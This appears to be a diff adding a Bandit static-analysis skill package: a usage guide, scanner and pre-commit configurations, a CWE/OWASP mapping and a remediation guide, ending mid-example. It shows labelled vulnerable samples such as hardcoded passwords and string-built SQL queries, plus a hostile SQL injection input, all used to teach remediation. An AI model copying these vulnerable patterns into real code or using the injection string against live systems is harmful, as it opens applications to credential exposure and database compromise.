pip install bandit
```
Create a configuration file `.bandit` or `.bandit.yaml` to customize scans:
```yaml
# .bandit.yaml
exclude_dirs:
- /tests/
- /venv/
- /.venv/
- /node_modules/
skips:
- B101 # Skip assert_used checks in test files
tests:
- B201 # Flask app run with debug=True
- B301 # Pickle usage
- B601 # Shell injection
- B602 # Shell=True in subprocess
```
### Step 2: Execute Security Scan
Run Bandit against Python codebase:
```bash
# Basic scan with severity threshold
bandit -r . -ll # Report only medium/high severity
# Comprehensive scan with detailed output
bandit -r . -f json -o report.json -v
# Scan with confidence filtering
bandit -r . -iii # Show only HIGH confidence findings (-i LOW, -ii MEDIUM, -iii HIGH)
# Exclude specific tests
bandit -r . -s B101,B601
```
### Step 3: Analyze Results
Bandit reports findings with:
- **Issue Type**: Vulnerability category (e.g., hardcoded_password, sql_injection)
- **Severity**: LOW, MEDIUM, HIGH
- **Confidence**: LOW, MEDIUM, HIGH
- **CWE**: Common Weakness Enumeration reference
- **Location**: File path and line number
Example output:
```
>> Issue: [B105:hardcoded_password_string] Possible hardcoded password: 'admin123'
Severity: Medium Confidence: Medium
CWE: CWE-259 (Use of Hard-coded Password)
Location: app/config.py:12
```
### Step 4: Prioritize Findings
Focus remediation efforts using this priority matrix:
1. **Critical**: HIGH severity + HIGH confidence
2. **High**: HIGH severity OR MEDIUM severity + HIGH confidence
3. **Medium**: MEDIUM severity + MEDIUM confidence
4. **Low**: LOW severity OR LOW confidence
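A sketch that applies this matrix to `bandit -f json` output (Bandit's JSON report exposes `issue_severity` and `issue_confidence` per finding):
```python
import json

PRIORITY_ORDER = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3}

def priority(severity: str, confidence: str) -> str:
    severity, confidence = severity.upper(), confidence.upper()
    if severity == "HIGH" and confidence == "HIGH":
        return "Critical"
    if severity == "HIGH" or (severity == "MEDIUM" and confidence == "HIGH"):
        return "High"
    if severity == "MEDIUM" and confidence == "MEDIUM":
        return "Medium"
    return "Low"

with open("bandit_report.json") as f:
    results = json.load(f)["results"]

ranked = sorted(results, key=lambda r: PRIORITY_ORDER[priority(r["issue_severity"], r["issue_confidence"])])
for finding in ranked:
    label = priority(finding["issue_severity"], finding["issue_confidence"])
    print(f"[{label}] {finding['test_id']} {finding['filename']}:{finding['line_number']} - {finding['issue_text']}")
```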
### Step 5: Remediate Vulnerabilities
For each finding, consult the bundled `references/remediation_guide.md` for secure coding patterns. Common remediation strategies:
- **Hardcoded Secrets (B105, B106)**: Use environment variables or secret management services
- **SQL Injection (B608)**: Use parameterized queries with SQLAlchemy or psycopg2
- **Command Injection (B602, B605)**: Avoid `shell=True`, use `shlex.split()` for argument parsing
- **Weak Cryptography (B303, B304)**: Replace MD5/SHA1 with SHA256/SHA512 or bcrypt for passwords
- **Insecure Deserialization (B301)**: Avoid pickle, use JSON or MessagePack with schema validation
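For example, the usual B608 fix is to move user input out of the SQL string and into bound parameters; a self-contained sqlite3 sketch (the same pattern applies to psycopg2 and SQLAlchemy):
```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE users (id TEXT, name TEXT)")
cur.execute("INSERT INTO users VALUES ('42', 'alice')")

user_id = "42' OR '1'='1"  # hostile input

# Flagged by B608: user input concatenated into the query string
# cur.execute(f"SELECT * FROM users WHERE id = '{user_id}'")

# Remediated: parameterized query, the driver binds the value safely
cur.execute("SELECT * FROM users WHERE id = ?", (user_id,))
print(cur.fetchall())  # [] - the hostile string is treated as data, not SQL
```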
### Step 6: Integrate into CI/CD
Add Bandit to CI/CD pipelines to enforce security gates:
```yaml
# .github/workflows/security-scan.yml
name: Security Scan
on: [push, pull_request]
jobs:
bandit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install Bandit
run: pip install bandit
      - name: Run Bandit (JSON report)
        run: bandit -r . -f json -o bandit-report.json || true  # do not fail here; gate in the next step
      - name: Fail on high severity issues
        run: bandit -r . -lll -f txt
```
Use the bundled script `scripts/bandit_analyzer.py` for enhanced reporting with OWASP mapping.
## Security Considerations
- **Sensitive Data Handling**: Bandit reports may contain code snippets with hardcoded credentials. Ensure reports are stored securely and access is restricted. Use `--no-code` flag to exclude code snippets from reports.
- **Access Control**: Run Bandit in sandboxed CI/CD environments with read-only access to source code. Restrict write permissions to prevent tampering with security configurations.
- **Audit Logging**: Log all Bandit executions with timestamps, scan scope, findings count, and operator identity for security auditing and compliance purposes.
- **Compliance**: Bandit supports SOC2, PCI-DSS, and GDPR compliance by identifying security weaknesses. Document scan frequency, remediation timelines, and exception approvals for audit trails.
- **False Positives**: Review LOW confidence findings manually. Use inline `# nosec` comments sparingly and document justifications in code review processes.
## Bundled Resources
### Scripts (`scripts/`)
- `bandit_analyzer.py` - Enhanced Bandit wrapper that parses JSON output, maps findings to OWASP Top 10, generates HTML reports, and integrates with ticketing systems. Use for comprehensive security reporting.
### References (`references/`)
- `remediation_guide.md` - Detailed secure coding patterns for common Bandit findings, including code examples for SQLAlchemy parameterization, secure subprocess usage, and cryptographic best practices. Consult when remediating specific vulnerability types.
- `cwe_owasp_mapping.md` - Complete mapping between Bandit issue codes, CWE identifiers, and OWASP Top 10 categories. Use for security framework alignment and compliance reporting.
### Assets (`assets/`)
- `bandit_config.yaml` - Production-ready Bandit configuration with optimized test selection, exclusion patterns for common false positives, and severity thresholds. Use as baseline configuration for projects.
- `pre-commit-config.yaml` - Pre-commit hook configuration for Bandit integration. Prevents commits with HIGH severity findings.
## Common Patterns
### Pattern 1: Baseline Security Scan
Establish security baseline for legacy codebases:
```bash
# Generate baseline report
bandit -r . -f json -o baseline.json
# Compare future scans against baseline
bandit -r . -f json -o current.json
diff <(jq -S . baseline.json) <(jq -S . current.json)
```
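The `diff` above is noisy when line numbers shift; a sketch that reports only findings present in the current scan but not in the baseline, keyed on test ID, file, and issue text:
```python
import json

def finding_keys(path):
    with open(path) as f:
        return {
            (r["test_id"], r["filename"], r["issue_text"])
            for r in json.load(f)["results"]
        }

new_findings = finding_keys("current.json") - finding_keys("baseline.json")
for test_id, filename, issue in sorted(new_findings):
    print(f"NEW {test_id} {filename}: {issue}")
```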
### Pattern 2: Security Gating in Pull Requests
Block merges with HIGH severity findings:
```bash
# Exit with error if HIGH severity issues found
bandit -r . -lll -f txt
if [ $? -ne 0 ]; then
echo "HIGH severity security issues detected - blocking merge"
exit 1
fi
```
### Pattern 3: Progressive Security Hardening
Incrementally increase security standards:
```bash
# Phase 1: Block only CRITICAL (HIGH severity + HIGH confidence)
bandit -r . -lll -iii
# Phase 2: Block HIGH severity
bandit -r . -lll
# Phase 3: Block MEDIUM severity and above
bandit -r . -ll
```
### Pattern 4: Suppressing False Positives
Document exceptions inline with justification:
```python
# Example: Suppressing pickle warning for internal serialization
import pickle # nosec B301 - Internal cache, not user input
def load_cache(file_path):
with open(file_path, 'rb') as f:
return pickle.load(f) # nosec B301
```
## Integration Points
- **CI/CD**: Integrate as GitHub Actions, GitLab CI, Jenkins pipeline stage, or pre-commit hook. Use `scripts/bandit_analyzer.py` for enhanced reporting.
- **Security Tools**: Combine with Semgrep for additional SAST coverage, Safety for dependency scanning, and SonarQube for code quality metrics.
- **SDLC**: Execute during development (pre-commit), code review (PR checks), and release gates (pipeline stage). Establish baseline scans for legacy code and enforce strict checks for new code.
- **Ticketing Integration**: Use `scripts/bandit_analyzer.py` to automatically create Jira/GitHub issues for HIGH severity findings with remediation guidance.
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
1. Use confidence filtering: `bandit -r . -iii` (HIGH confidence only)
2. Exclude test files: `bandit -r . --exclude /tests/`
3. Customize `.bandit.yaml` to skip specific tests for known safe patterns
4. Review and suppress with inline `# nosec` comments with justification
### Issue: Scan Performance on Large Codebases
**Solution**:
1. Exclude dependencies: Add `/venv/`, `/.venv/`, `/site-packages/` to `.bandit.yaml` exclude_dirs
2. Use multiprocessing: Bandit automatically parallelizes for directories
3. Scan only changed files in CI/CD: `git diff --name-only origin/main | grep '\.py$' | xargs -r bandit`
### Issue: Missing Specific Vulnerability Types
**Solution**:
1. Check enabled tests: `bandit -l` (list all tests)
2. Ensure tests are not skipped in `.bandit.yaml`
3. Combine with Semgrep for additional coverage (e.g., business logic vulnerabilities)
4. Update Bandit regularly: `pip install --upgrade bandit`
### Issue: Integration with Pre-commit Hooks
**Solution**:
Use the bundled `assets/pre-commit-config.yaml`:
```yaml
- repo: https://github.com/PyCQA/bandit
rev: '1.7.5'
hooks:
- id: bandit
args: ['-ll', '--recursive', '--configfile', '.bandit.yaml']
```
Install hooks: `pre-commit install`
## References
- [Bandit Documentation](https://bandit.readthedocs.io/)
- [Bandit GitHub Repository](https://github.com/PyCQA/bandit)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)
- [CWE Database](https://cwe.mitre.org/)
- [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,211 @@
# Bandit Configuration File
# Production-ready configuration for Python security scanning
# Directories to exclude from scanning
exclude_dirs:
# Python environments
- /venv/
- /.venv/
- /env/
- /.env/
- /virtualenv/
- /.virtualenv/
- /site-packages/
- /dist-packages/
# Testing and build artifacts
- /tests/
- /test/
- /.pytest_cache/
- /.tox/
- /build/
- /dist/
- /.eggs/
- /*.egg-info/
# Version control and IDE
- /.git/
- /.svn/
- /.hg/
- /.idea/
- /.vscode/
- /__pycache__/
# Node modules and other language dependencies
- /node_modules/
- /vendor/
# Documentation and examples
- /docs/
- /examples/
# Tests to skip (use sparingly and document reasons)
skips:
# B101: Test for use of assert
# Commonly safe in test files and development code
# Consider keeping this enabled for production code
# - B101
# B311: Standard pseudo-random generators
# Only skip if using for non-security purposes (e.g., data generation)
# NEVER skip for security tokens, session IDs, or cryptographic operations
# - B311
# B404-B412: Import checks
# Skip only if you've reviewed and whitelisted specific imports
# - B404 # subprocess import
# - B405 # xml.etree.cElementTree import
# - B406 # xml.sax import
# - B407 # xml.expat import
# - B408 # xml.dom.minidom import
# - B409 # xml.dom.pulldom import
# - B410 # lxml import
# - B411 # xmlrpc import
# - B412 # httpoxy
# Specific tests to run (comment out to run all tests)
# Use this to focus on specific security checks
# tests:
# - B201 # Flask app run with debug=True
# - B301 # Pickle usage
# - B302 # Deserialization with the marshal module
# - B303 # Use of insecure MD2, MD4, MD5, or SHA1 hash
# - B304 # Use of insecure cipher
# - B305 # Use of insecure cipher mode
# - B306 # Use of mktemp
# - B307 # Use of eval
# - B308 # Use of mark_safe
# - B310 # Audit URL open for permitted schemes
# - B311 # Standard pseudo-random generators
# - B313 # XML bad element tree
# - B314 # XML bad element tree (lxml)
# - B315 # XML bad element tree (expat)
# - B316 # XML bad element tree (sax)
# - B317 # XML bad element tree (expatreader)
# - B318 # XML bad element tree (expatbuilder)
# - B319 # XML bad element tree (xmlrpc)
# - B320 # XML bad element tree (pulldom)
# - B321 # FTP-related functions
# - B323 # Unverified context
# - B324 # Use of insecure hash functions
# - B601 # Paramiko call with shell=True
# - B602 # subprocess call with shell=True
# - B603 # subprocess without shell equals true
# - B604 # Function call with shell=True
# - B605 # Starting a process with a shell
# - B606 # Starting a process without shell
# - B607 # Starting a process with a partial path
# - B608 # Possible SQL injection
# - B609 # Use of wildcard injection
# - B610 # SQL injection via Django extra()
# - B611 # SQL injection via Django RawSQL
# - B701 # jinja2 autoescape false
# - B702 # Test for use of mako templates
# - B703 # Django autoescape false
# Plugin configuration
# Customize individual plugin behaviors
# Shell injection plugin configuration
shell_injection:
# Additional commands to check for shell injection
# Default: ['os.system', 'subprocess.call', 'subprocess.Popen']
no_shell:
- os.system
- subprocess.call
- subprocess.Popen
- subprocess.run
# Hard-coded password plugin configuration
hardcoded_tmp_directory:
# Directories considered safe for temporary files
# tmp_dirs:
# - /tmp
# - /var/tmp
# Output configuration (for reference - set via CLI)
# These are applied at runtime, not in config file
# output_format: json
# output_file: bandit-report.json
# verbose: true
# level: LOW # Report severity: LOW, MEDIUM, HIGH
# confidence: LOW # Report confidence: LOW, MEDIUM, HIGH
# Severity and confidence thresholds
# LOW: Report all issues (default)
# MEDIUM: Report MEDIUM and HIGH severity issues only
# HIGH: Report only HIGH severity issues
# Example usage commands:
#
# Basic scan:
# bandit -r . -c .bandit.yaml
#
# Scan with MEDIUM and HIGH severity only:
# bandit -r . -c .bandit.yaml -ll
#
# Scan with HIGH confidence only:
# bandit -r . -c .bandit.yaml -iii
#
# Generate JSON report:
# bandit -r . -c .bandit.yaml -f json -o bandit-report.json
#
# Scan with enhanced analyzer script:
# python scripts/bandit_analyzer.py . --config .bandit.yaml --html report.html
# Progressive security hardening approach:
#
# Phase 1 - Baseline scan (all findings):
# bandit -r . -c .bandit.yaml
#
# Phase 2 - Block CRITICAL (HIGH severity + HIGH confidence):
# bandit -r . -c .bandit.yaml -lll -iii
#
# Phase 3 - Block HIGH severity:
# bandit -r . -c .bandit.yaml -lll
#
# Phase 4 - Block MEDIUM and above:
# bandit -r . -c .bandit.yaml -ll
#
# Phase 5 - Report all findings:
# bandit -r . -c .bandit.yaml
# Integration with CI/CD:
#
# GitHub Actions:
# - name: Run Bandit
# run: |
# pip install bandit
# bandit -r . -c .bandit.yaml -ll -f json -o bandit-report.json
# bandit -r . -c .bandit.yaml -ll || exit 1
#
# GitLab CI:
# bandit:
# image: python:3.11
# script:
# - pip install bandit
# - bandit -r . -c .bandit.yaml -ll
# allow_failure: false
#
# Jenkins:
# stage('Security Scan') {
# steps {
# sh 'pip install bandit'
# sh 'bandit -r . -c .bandit.yaml -ll -f json -o bandit-report.json'
# }
# }
# False positive handling:
#
# Inline suppression (use sparingly and document):
# import pickle # nosec B403 - Internal use only, not exposed to user input
#
# Line-specific suppression:
# result = eval(safe_expression) # nosec B307
#
# Block suppression:
# # nosec
# import xml.etree.ElementTree as ET
#
# NOTE: Always document WHY you're suppressing a finding
# Security team should review all nosec comments during code review

View File

@@ -0,0 +1,217 @@
# Pre-commit Hook Configuration for Bandit
#
# This configuration integrates Bandit security scanning into your git workflow,
# preventing commits that introduce HIGH severity security vulnerabilities.
#
# Installation:
# 1. Install pre-commit: pip install pre-commit
# 2. Copy this file to .pre-commit-config.yaml in your repository root
# 3. Install hooks: pre-commit install
# 4. (Optional) Run on all files: pre-commit run --all-files
#
# Usage:
# - Hooks run automatically on 'git commit'
# - Bypass hooks temporarily: git commit --no-verify (use sparingly!)
# - Update hooks: pre-commit autoupdate
# - Test hooks: pre-commit run --all-files
repos:
# Python code formatting and linting
- repo: https://github.com/psf/black
rev: 23.12.1
hooks:
- id: black
language_version: python3.11
- repo: https://github.com/pycqa/isort
rev: 5.13.2
hooks:
- id: isort
args: ["--profile", "black"]
- repo: https://github.com/pycqa/flake8
rev: 7.0.0
hooks:
- id: flake8
args: ['--max-line-length=100', '--extend-ignore=E203,W503']
# Security scanning with Bandit
- repo: https://github.com/PyCQA/bandit
rev: '1.7.5'
hooks:
- id: bandit
name: Bandit Security Scan
args:
# Block HIGH and MEDIUM severity issues
- '-ll'
# Recursive scan
- '--recursive'
# Use custom config if present
- '--configfile'
- '.bandit.yaml'
# Skip low-priority tests to reduce false positives
# Uncomment to skip specific tests:
# - '-s'
# - 'B101,B601'
# Only scan Python files
files: \.py$
# Exclude test files (adjust pattern as needed)
exclude: |
(?x)^(
tests/.*|
test_.*\.py|
.*_test\.py
)$
# Alternative Bandit configuration with stricter settings
# Uncomment to use this instead of the above
# - repo: https://github.com/PyCQA/bandit
# rev: '1.7.5'
# hooks:
# - id: bandit
# name: Bandit Security Scan (Strict)
# args:
# # Block only HIGH severity with HIGH confidence (Critical findings)
# - '-lll'
# - '-iii'
# - '--recursive'
# - '--configfile'
# - '.bandit.yaml'
# files: \.py$
# Alternative: Run Bandit with custom script for enhanced reporting
# Uncomment to use enhanced analyzer
# - repo: local
# hooks:
# - id: bandit-enhanced
# name: Bandit Enhanced Security Scan
# entry: python scripts/bandit_analyzer.py
# args:
# - '.'
# - '--config'
# - '.bandit.yaml'
# - '--min-priority'
# - '4' # HIGH priority
# language: python
# files: \.py$
# pass_filenames: false
# Additional security and quality checks
- repo: https://github.com/pre-commit/pre-commit-hooks
rev: v4.5.0
hooks:
# Prevent commits to main/master
- id: no-commit-to-branch
args: ['--branch', 'main', '--branch', 'master']
# Check for merge conflicts
- id: check-merge-conflict
# Detect private keys
- id: detect-private-key
# Check for large files (>500KB)
- id: check-added-large-files
args: ['--maxkb=500']
# Check YAML syntax
- id: check-yaml
args: ['--safe']
# Check JSON syntax
- id: check-json
# Check for files that would conflict on case-insensitive filesystems
- id: check-case-conflict
# Ensure files end with newline
- id: end-of-file-fixer
# Trim trailing whitespace
- id: trailing-whitespace
# Check for debugger imports
- id: debug-statements
# Dependency security scanning
- repo: https://github.com/Lucas-C/pre-commit-hooks-safety
rev: v1.3.3
hooks:
- id: python-safety-dependencies-check
files: requirements.*\.txt$
# Secret detection
- repo: https://github.com/Yelp/detect-secrets
rev: v1.4.0
hooks:
- id: detect-secrets
args: ['--baseline', '.secrets.baseline']
exclude: package-lock.json
# Configuration for progressive security hardening
#
# Phase 1: Start with warnings only (for legacy codebases)
# Set bandit args to ['-r', '.', '--configfile', '.bandit.yaml', '--exit-zero']
# This runs Bandit but doesn't block commits
#
# Phase 2: Block HIGH severity only
# Set bandit args to ['-lll', '--recursive', '--configfile', '.bandit.yaml']
#
# Phase 3: Block MEDIUM and HIGH severity
# Set bandit args to ['-ll', '--recursive', '--configfile', '.bandit.yaml']
#
# Phase 4: Block all findings (strictest)
# Set bandit args to ['-l', '--recursive', '--configfile', '.bandit.yaml']
# Bypassing hooks (use judiciously)
#
# Skip all hooks for a single commit:
# git commit --no-verify -m "Emergency hotfix"
#
# Skip specific hook:
# SKIP=bandit git commit -m "Commit message"
#
# Note: All bypasses should be documented and reviewed in code review
# Troubleshooting
#
# Hook fails with "command not found":
# - Ensure pre-commit is installed: pip install pre-commit
# - Reinstall hooks: pre-commit install
#
# Hook fails with import errors:
# - Install dependencies: pip install -r requirements.txt
# - Update hooks: pre-commit autoupdate
#
# Too many false positives:
# - Adjust exclude patterns in .bandit.yaml
# - Use inline # nosec comments with justification
# - Adjust severity threshold in args (-l, -ll, -lll)
#
# Performance issues:
# - Exclude virtual environments in .bandit.yaml
# - Use 'files' and 'exclude' patterns to limit scope
# - Consider running stricter checks only on CI/CD
# CI/CD Integration
#
# Run pre-commit checks in CI/CD:
#
# GitHub Actions:
# - name: Pre-commit checks
# uses: pre-commit/action@v3.0.0
#
# GitLab CI:
# pre-commit:
# image: python:3.11
# script:
# - pip install pre-commit
# - pre-commit run --all-files
#
# Jenkins:
# stage('Pre-commit') {
# steps {
# sh 'pip install pre-commit'
# sh 'pre-commit run --all-files'
# }
# }

View File

@@ -0,0 +1,157 @@
# Bandit Test to CWE and OWASP Mapping
Complete mapping between Bandit test IDs, Common Weakness Enumeration (CWE), and OWASP Top 10 2021 categories.
## Table of Contents
- [Cryptographic Issues](#cryptographic-issues)
- [Injection Vulnerabilities](#injection-vulnerabilities)
- [Security Misconfiguration](#security-misconfiguration)
- [Insecure Deserialization](#insecure-deserialization)
- [Access Control Issues](#access-control-issues)
## Cryptographic Issues
### OWASP A02:2021 - Cryptographic Failures
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B302 | Deserialization with the insecure marshal module | CWE-502 | MEDIUM |
| B303 | Use of insecure MD2, MD4, MD5, or SHA1 hash function | CWE-327 | MEDIUM |
| B304 | Use of insecure cipher (e.g., DES, RC4, Blowfish) | CWE-327 | MEDIUM |
| B305 | Use of insecure cipher mode | CWE-327 | MEDIUM |
| B306 | Use of insecure and deprecated function (mktemp) | CWE-377 | MEDIUM |
| B307 | Use of possibly insecure function (eval) | CWE-78 | MEDIUM |
| B311 | Standard pseudo-random generators are not suitable for security | CWE-330 | LOW |
| B323 | Unverified context with insecure default | CWE-327 | MEDIUM |
| B324 | Use of insecure hash functions in hashlib | CWE-327 | HIGH |
| B401 | Use of insecure telnet protocol | CWE-319 | HIGH |
| B402 | Use of insecure FTP protocol | CWE-319 | HIGH |
| B403 | Use of insecure pickle import | CWE-502 | LOW |
| B404 | Use of insecure subprocess import | CWE-78 | LOW |
| B413 | Use of pycrypto | CWE-327 | HIGH |
| B501 | Request with certificate validation disabled (verify=False) | CWE-295 | HIGH |
| B502 | Use of weak SSL/TLS protocol | CWE-327 | HIGH |
| B503 | Use of insecure SSL/TLS cipher | CWE-327 | MEDIUM |
| B504 | SSL with no version specified | CWE-327 | LOW |
| B505 | Use of weak cryptographic key (e.g., RSA < 2048 bits) | CWE-326 | MEDIUM |
**Remediation Strategy**: Replace weak cryptographic algorithms with strong alternatives. Use SHA-256 or SHA-512 for hashing, AES-256 for encryption, and TLS 1.2+ for transport security. For password hashing, use bcrypt, scrypt, or Argon2.
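As one illustration of the strategy above, password hashing can be done with only the standard library via PBKDF2 (a sketch; the iteration count is illustrative, and a memory-hard KDF such as bcrypt or Argon2 remains preferable where available):
```python
import hashlib
import hmac
import os

def hash_password(password: str, iterations: int = 600_000) -> tuple[bytes, bytes]:
    """Derive a PBKDF2-HMAC-SHA256 digest with a random per-password salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password: str, salt: bytes, expected: bytes,
                    iterations: int = 600_000) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, expected)
```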
## Injection Vulnerabilities
### OWASP A03:2021 - Injection
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B308 | Use of mark_safe | CWE-80 | MEDIUM |
| B313 | XML bad element tree | CWE-611 | MEDIUM |
| B314 | XML bad element tree (lxml) | CWE-611 | MEDIUM |
| B315 | XML bad element tree (expat) | CWE-611 | MEDIUM |
| B316 | XML bad element tree (sax) | CWE-611 | MEDIUM |
| B317 | XML bad element tree (expatreader) | CWE-611 | MEDIUM |
| B318 | XML bad element tree (expatbuilder) | CWE-611 | MEDIUM |
| B319 | XML bad element tree (xmlrpc) | CWE-611 | HIGH |
| B320 | XML bad element tree (pulldom) | CWE-611 | HIGH |
| B321 | FTP-related functions are being called | CWE-319 | HIGH |
| B405 | XML mini DOM import | CWE-611 | LOW |
| B406 | XML etree import | CWE-611 | LOW |
| B407 | XML expat import | CWE-611 | LOW |
| B408 | XML minidom import | CWE-611 | LOW |
| B410 | XML etree import (lxml) | CWE-611 | LOW |
| B411 | XML standard library imports | CWE-611 | LOW |
| B412 | Deprecated httpoxy vulnerability | CWE-807 | LOW |
| B601 | Paramiko call with shell=True | CWE-78 | HIGH |
| B602 | subprocess call with shell=True | CWE-78 | HIGH |
| B603 | subprocess without shell=True | CWE-78 | LOW |
| B604 | Function call with shell=True | CWE-78 | HIGH |
| B605 | Starting a process with a shell | CWE-78 | HIGH |
| B606 | Starting a process without shell | CWE-78 | LOW |
| B607 | Starting a process with a partial path | CWE-78 | LOW |
| B608 | Possible SQL injection vector through string formatting | CWE-89 | MEDIUM |
| B609 | Use of wildcard injection | CWE-78 | MEDIUM |
| B610 | Potential SQL injection via Django extra() | CWE-89 | MEDIUM |
| B611 | Potential SQL injection via Django RawSQL | CWE-89 | MEDIUM |
**Remediation Strategy**: Never concatenate user input into commands, queries, or markup. Use parameterized queries for SQL, safe XML parsers with DTD processing disabled, and avoid `shell=True` in subprocess calls. Use `shlex.split()` for argument parsing.
## Security Misconfiguration
### OWASP A05:2021 - Security Misconfiguration
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B201 | Flask app run with debug=True | CWE-489 | HIGH |
| B310 | Audit URL open for permitted schemes | CWE-939 | MEDIUM |
| B506 | Test for use of yaml load | CWE-20 | MEDIUM |
| B507 | SSH with no host key verification | CWE-295 | MEDIUM |
| B701 | jinja2 autoescape false | CWE-94 | HIGH |
| B702 | Test for use of mako templates | CWE-94 | MEDIUM |
| B703 | Django autoescape false | CWE-94 | MEDIUM |
**Remediation Strategy**: Disable debug mode in production, validate and sanitize all inputs, enable autoescape in template engines, use safe YAML loaders (`yaml.safe_load()`), and enforce strict host key verification for SSH connections.
## Insecure Deserialization
### OWASP A08:2021 - Software and Data Integrity Failures
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B301 | Pickle and modules that wrap it can be unsafe | CWE-502 | MEDIUM |
**Remediation Strategy**: Avoid using pickle for untrusted data. Use JSON, MessagePack, or Protocol Buffers with strict schema validation. If pickle is necessary, implement cryptographic signing and validation of serialized data.
## Access Control Issues
### OWASP A01:2021 - Broken Access Control
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B506 | Test for use of yaml load (arbitrary code execution) | CWE-20 | MEDIUM |
**Remediation Strategy**: Use `yaml.safe_load()` instead of `yaml.load()` to prevent arbitrary code execution. Implement proper access controls and input validation for all YAML processing.
## Hardcoded Credentials
### OWASP A02:2021 - Cryptographic Failures
| Test ID | Description | CWE | Severity |
|---------|-------------|-----|----------|
| B105 | Possible hardcoded password string | CWE-259 | LOW |
| B106 | Possible hardcoded password function argument | CWE-259 | LOW |
| B107 | Possible hardcoded password default argument | CWE-259 | LOW |
**Remediation Strategy**: Never hardcode credentials. Use environment variables, secret management services (HashiCorp Vault, AWS Secrets Manager), or encrypted configuration files with proper key management.
## Priority Matrix
Use this matrix to prioritize remediation efforts:
| Priority | Criteria | Action |
|----------|----------|--------|
| **CRITICAL** | HIGH Severity + HIGH Confidence | Immediate remediation required |
| **HIGH** | HIGH Severity OR MEDIUM Severity + HIGH Confidence | Remediate within 1 sprint |
| **MEDIUM** | MEDIUM Severity + MEDIUM Confidence | Remediate within 2 sprints |
| **LOW** | LOW Severity OR LOW Confidence | Address during refactoring |
| **INFORMATIONAL** | Review only | Document and monitor |
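The matrix translates directly into a small triage helper (a sketch, assuming Bandit's LOW/MEDIUM/HIGH values for `issue_severity` and `issue_confidence`):
```python
def triage_priority(severity: str, confidence: str) -> str:
    """Map a finding's severity and confidence onto the priority matrix above.

    Falls back to INFORMATIONAL for unrecognized values.
    """
    severity, confidence = severity.upper(), confidence.upper()
    if severity == "HIGH" and confidence == "HIGH":
        return "CRITICAL"
    if severity == "HIGH" or (severity == "MEDIUM" and confidence == "HIGH"):
        return "HIGH"
    if severity == "MEDIUM" and confidence == "MEDIUM":
        return "MEDIUM"
    if severity == "LOW" or confidence == "LOW":
        return "LOW"
    return "INFORMATIONAL"
```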
## OWASP Top 10 2021 Coverage
| OWASP Category | Bandit Coverage | Notes |
|----------------|-----------------|-------|
| A01:2021 Broken Access Control | Partial | Covers YAML deserialization |
| A02:2021 Cryptographic Failures | Excellent | Comprehensive crypto checks |
| A03:2021 Injection | Excellent | SQL, command, XML injection |
| A04:2021 Insecure Design | None | Requires manual review |
| A05:2021 Security Misconfiguration | Good | Debug mode, templating |
| A06:2021 Vulnerable Components | None | Use Safety or pip-audit |
| A07:2021 Authentication Failures | Partial | Hardcoded credentials only |
| A08:2021 Data Integrity Failures | Good | Deserialization issues |
| A09:2021 Security Logging Failures | None | Requires manual review |
| A10:2021 SSRF | Partial | URL scheme validation |
## References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Database](https://cwe.mitre.org/)
- [Bandit Documentation](https://bandit.readthedocs.io/)

View File

@@ -0,0 +1,622 @@
# Bandit Finding Remediation Guide
Comprehensive secure coding patterns and remediation strategies for common Bandit findings.
## Table of Contents
- [Hardcoded Credentials](#hardcoded-credentials)
- [SQL Injection](#sql-injection)
- [Command Injection](#command-injection)
- [Weak Cryptography](#weak-cryptography)
- [Insecure Deserialization](#insecure-deserialization)
- [XML External Entity (XXE)](#xml-external-entity-xxe)
- [Security Misconfiguration](#security-misconfiguration)
---
## Hardcoded Credentials
### B105, B106, B107: Hardcoded Passwords
**Vulnerable Code:**
```python
# B105: Hardcoded password string
DATABASE_PASSWORD = "admin123"
# B106: Hardcoded password in function call
db.connect(host="localhost", password="secret_password")
# B107: Hardcoded password default argument
def connect_db(password="default_pass"):
pass
```
**Secure Solution:**
```python
import os
from dotenv import load_dotenv
# Load environment variables
load_dotenv()
# Use environment variables
DATABASE_PASSWORD = os.environ.get("DATABASE_PASSWORD")
if not DATABASE_PASSWORD:
raise ValueError("DATABASE_PASSWORD environment variable not set")
# Use environment variables in function calls
db.connect(
host=os.environ.get("DB_HOST", "localhost"),
password=os.environ.get("DB_PASSWORD")
)
# Use secret management service (example with AWS Secrets Manager)
import boto3
from botocore.exceptions import ClientError
def get_secret(secret_name):
session = boto3.session.Session()
client = session.client(service_name='secretsmanager', region_name='us-east-1')
try:
response = client.get_secret_value(SecretId=secret_name)
return response['SecretString']
except ClientError as e:
raise Exception(f"Failed to retrieve secret: {e}")
DATABASE_PASSWORD = get_secret("prod/db/password")
```
**Best Practices:**
- Use environment variables with `.env` files (never commit `.env` to version control)
- Use secret management services (HashiCorp Vault, AWS Secrets Manager, Azure Key Vault)
- Implement secret rotation policies
- Use configuration management tools (Ansible Vault, Kubernetes Secrets)
---
## SQL Injection
### B608: SQL Injection via String Formatting
**Vulnerable Code:**
```python
# String formatting (UNSAFE)
user_id = request.GET['id']
query = f"SELECT * FROM users WHERE id = {user_id}"
cursor.execute(query)
# String concatenation (UNSAFE)
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
# Percent formatting (UNSAFE)
query = "SELECT * FROM users WHERE email = '%s'" % email
cursor.execute(query)
```
**Secure Solution with psycopg2:**
```python
import psycopg2
# Parameterized queries (SAFE)
